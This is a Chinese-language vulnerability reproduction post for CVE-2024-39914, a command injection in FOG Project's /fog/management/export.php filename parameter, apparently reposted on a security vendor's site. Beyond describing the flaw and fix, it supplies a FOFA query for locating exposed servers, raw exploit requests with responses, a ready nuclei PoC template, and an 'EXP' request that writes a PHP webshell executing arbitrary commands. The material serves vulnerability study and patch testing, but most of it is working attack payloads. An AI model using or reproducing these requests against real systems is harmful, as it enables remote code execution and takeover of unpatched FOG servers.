长亭百川云 - 文章详情

【在野】CVE-2024-39914 漏洞复现 poc exp

fgz

146

2024-07-19

免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

01

漏洞名称

FOG 在 /fog/management/export.php 中存在命令注入漏洞

02

漏洞影响

FOG < 1.5.10.34版本

03

漏洞描述

FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。

04

FOFA搜索语句

body="FOG Project"

05

漏洞复现

第一步,打开首页瞅一眼

第二步,向靶场发送如下数据包,核心是向qzjtyryy.php文件写入随机字符串echo+'kpvyggzrnonvuycaipvl'+>+qzjtyryy.php

POST /fog/management/export.php?filename=$(echo+'kpvyggzrnonvuycaipvl'+>+qzjtyryy.php)&type=pdf HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Length: 25
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OK
Connection: close
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate
Content-Disposition: attachment; filename=$(echo 'kpvyggzrnonvuycaipvl' > qzjtyryy.php).pdf
Content-Security-Policy: default-src 'none';script-src 'self' 'unsafe-eval';connect-src 'self';img-src 'self' data:;style-src 'self' 'unsafe-inline';font-src 'self';
     Content-Type: application/pdf
Date: Fri, 19 Jul 2024 01:20:08 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
Set-Cookie: PHPSESSID=9k547umgoipd3k1giph5bh287j; path=/
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Powered-By: PHP/7.2.24
X-Xss-Protection: 1; mode=block

第三步,访问回显文件

GET /fog/management/qzjtyryy.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
Cookie: PHPSESSID=9k547umgoipd3k1giph5bh287j

响应内容如下

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Date: Fri, 19 Jul 2024 01:20:08 GMT
Server: Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
X-Powered-By: PHP/7.2.24
kpvyggzrnonvuycaipvl

漏洞复现成功

参考链接

https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j

06

nuclei poc

poc文件内容如下

id: CVE-2024-39914
info:
  name: FOG 在 /fog/management/export.php?filename= 中存在命令注入漏洞
  author: fgz
  severity: critical
  description: FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。
  metadata:
    max-request: 1
    fofa-query: body="FOG Project"
    verified: true
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}"
  file_content: "{{to_lower(rand_text_alpha(20))}}"
  rboundary: "{{to_lower(rand_text_alpha(29))}}"
requests:
  - raw:
      - |+
        POST /fog/management/export.php?filename=$(echo+'{{file_content}}'+>+{{file_name}}.php)&type=pdf HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        fogguiuser=fog&nojson=2
      - |
        GET /fog/management/{{file_name}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

07

EXP

写入webshell

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+rce.php)&type=pdf HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 fogguiuser=fog&nojson=2

08

修复建议

升级到最新版本。漏洞利用成本非常低,请尽快修复。

~~~点赞的大佬最帅~~~

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2